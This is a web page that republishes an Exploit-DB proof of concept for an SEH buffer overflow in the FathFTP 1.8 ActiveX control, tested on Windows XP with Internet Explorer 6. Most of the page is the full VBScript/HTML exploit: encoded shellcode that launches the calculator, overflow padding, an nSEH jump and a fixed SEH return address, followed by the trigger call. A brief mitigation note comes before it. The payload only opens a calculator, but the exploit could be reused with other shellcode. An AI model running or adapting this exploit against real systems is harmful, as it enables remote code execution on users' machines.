Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
FathFTP 1.8 (SEH) ActiveX Buffer Overflow - exploit.company
header-logo
Suggest Exploit
vendor:
FathFTP
by:
MadjiX
7.5
CVSS
HIGH
Buffer Overflow
CWE
Product Name: FathFTP
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3

FathFTP 1.8 (SEH) ActiveX Buffer Overflow

This exploit targets FathFTP version 1.8 and utilizes a buffer overflow vulnerability to execute arbitrary code. The exploit is written in VBScript and contains shellcode that launches the Windows calculator application. It has been tested on Windows XP SP3 with Internet Explorer 6.

Mitigation:

Apply the latest security patches provided by the vendor. Disable ActiveX controls in web browsers.
Source

Exploit-DB raw data:

<html>
<object classid='clsid:62A989CE-D39A-11D5-86F0-B9C370762176' id='target'></object>
<script language='vbscript'>
' Exploit Title: FathFTP 1.8 (SEH) ActiveX Buffer Overflow
' Author: MadjiX
' Software Link: http://www.fathsoft.com/fathftp.html
' Version 1.7 : http://www.exploit-db.com/exploits/14269/ (Thanks Blake)
' Tested on: Windows XP SP3 FR / IE6
' Visit : www.sec4ever.com
'---------------------------------------------------'
'                  _____ __                         '
'____________________  // /_______   ______________ '
'__  ___/  _ \  ___/  // /_  _ \_ | / /  _ \/  ___/ '
'_(__  )/  __/ /__ /__  __/  __/_ |/ //  __/  /     '
'/____/ \___/\___/   /_/  \___/_____/ \___//_/      '
'                                                   '
'                   Security Team Members           '
'---------------------------------------------------'

' EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _
unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _
unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _
unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _
unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _
unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _
unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _
unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _
unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _
unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _
unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _
unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _
unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _
unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _
unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _
unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _
unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _
unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _
unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _
unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _
unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _
unescape("%50%68")

nops = string(12, unescape("%90"))
buff=String(1188, "A")
nseh=unescape("%eb%06%90%90") 'tangiza 5fifa :D
seh=unescape("%3F%28%C6%72") 'universal
buff2=String(8888, "C")

exploit = buff + nseh + seh + nops + shellcode + buff2
target.RasIsConnected exploit

</script>
</html>

Navigation

Suggest Exploit

Services By CQR